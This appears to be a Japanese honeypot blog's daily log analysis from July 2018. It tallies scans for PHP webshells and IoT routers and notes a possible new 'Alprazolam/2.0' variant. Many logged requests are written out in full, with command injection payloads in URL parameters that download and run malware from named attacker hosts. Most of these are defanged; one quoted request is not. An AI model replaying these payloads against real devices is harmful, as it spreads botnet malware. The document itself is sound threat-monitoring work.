S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypotの簡易分析(53日目)

WOWHoneypotの簡易分析(53日目)

honeypot

WOWhoneypotの2018/07/26(運用53日目)の簡易分析です。
本日の総アクセス件数は 136件です。以下が全アクセスログです。

36 2018-07-26 GET /
4 2018-07-26 POST /qq.php
4 2018-07-26 POST /GponForm/diag_Form?images/
2 2018-07-26 PROPFIND /
2 2018-07-26 POST /zuoshou.php
2 2018-07-26 POST /yao.php
2 2018-07-26 POST /xx.php
2 2018-07-26 POST /xw.php
2 2018-07-26 POST /xw1.php
2 2018-07-26 POST /xshell.php
2 2018-07-26 POST /xiao.php
2 2018-07-26 POST /xiaoma.php
2 2018-07-26 POST /wuwu11.php
2 2018-07-26 POST /wshell.php
2 2018-07-26 POST /w.php
2 2018-07-26 POST /weixiao.php
2 2018-07-26 POST /webslee.php
2 2018-07-26 POST /wc.php
2 2018-07-26 POST /system.php
2 2018-07-26 POST /s.php
2 2018-07-26 POST /sheep.php
2 2018-07-26 POST /q.php
2 2018-07-26 POST /phpstudy.php
2 2018-07-26 POST /pe.php
2 2018-07-26 POST /mx.php
2 2018-07-26 POST /log.php
2 2018-07-26 POST /lindex.php
2 2018-07-26 POST /hm.php
2 2018-07-26 POST /feixiang.php
2 2018-07-26 POST /fack.php
2 2018-07-26 POST /defect.php
2 2018-07-26 POST /db_session.init.php
2 2018-07-26 POST /db.init.php
2 2018-07-26 POST /db__.init.php
2 2018-07-26 POST /data.php
2 2018-07-26 POST /conflg.php
2 2018-07-26 POST /cmd.php
2 2018-07-26 POST /cainiao.php
2 2018-07-26 POST /aotu.php
2 2018-07-26 POST /angge.php
2 2018-07-26 POST /ak47.php
2 2018-07-26 POST /9678.php
2 2018-07-26 GET /webdav/
2 2018-07-26 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
2 2018-07-26 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-07-26 HEAD /phpmyadmin/index.php
1 2018-07-26 HEAD /phpmyadmin/%20index.php
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xo.alprazolam.rip/dlink%20-O%20-%3E%20/tmp/xoxo;sh%20/tmp/xoxo%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://hakaiboatnet.pw/dlink%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254.118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164.41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;cd%20/tmp;wget%20hxxp://178.128.11.199/qtx.mips;chmod%20777%20qtx.mips;./qtx.mips%20dlink%20%27$

phpMyAdmin関連(4件)とphpに対するPOST(90件)と/を除外したアクセス数です。

4 2018-07-26 POST /GponForm/diag_Form?images/
2 2018-07-26 GET /webdav/
2 2018-07-26 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254[.]118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
2 2018-07-26 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xo.alprazolam.rip/dlink%20-O%20-%3E%20/tmp/xoxo;sh%20/tmp/xoxo%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://hakaiboatnet.pw/dlink%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11[.]199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;cd%20/tmp;wget%20hxxp://178.128.11[.]199/qtx.mips;chmod%20777%20qtx.mips;./qtx.mips%20dlink%20%27$

昨日同様、IoT機器を狙ったGemini/2.0が大半です。
マルウェアの配布先にドメインを利用している以下のものは新たな種類で「Alprazolam/2.0」と呼ぶべきかも知れません。

GET /login.cgi?cli=aa%20aa%27;wget%20http://xo.alprazolam.rip/dlink%20-O%20-%3E%20/tmp/xoxo;sh%20/tmp/xoxo%27$ HTTP/1.1
User-Agent: Alprazolam/2.0 

 

本日のハンティングログは以下です。

2 2018-07-26 wget+hxxp://199.195.254[.]118/jaws
2 2018-07-26 wget hxxp://178.128.11[.]199/rvs
2 2018-07-26 wget hxxp://178.128.11[.]199/qtx.mips
1 2018-07-26 wget hxxp://xo.alprazolam[.]rip/dlink
1 2018-07-26 wget hxxp://hakaiboatnet[.]pw/dlink
1 2018-07-26 wget hxxp://199.195.254[.]118/dlink
1 2018-07-26 wget hxxp://185.172.164[.]41/e 

 

以上です。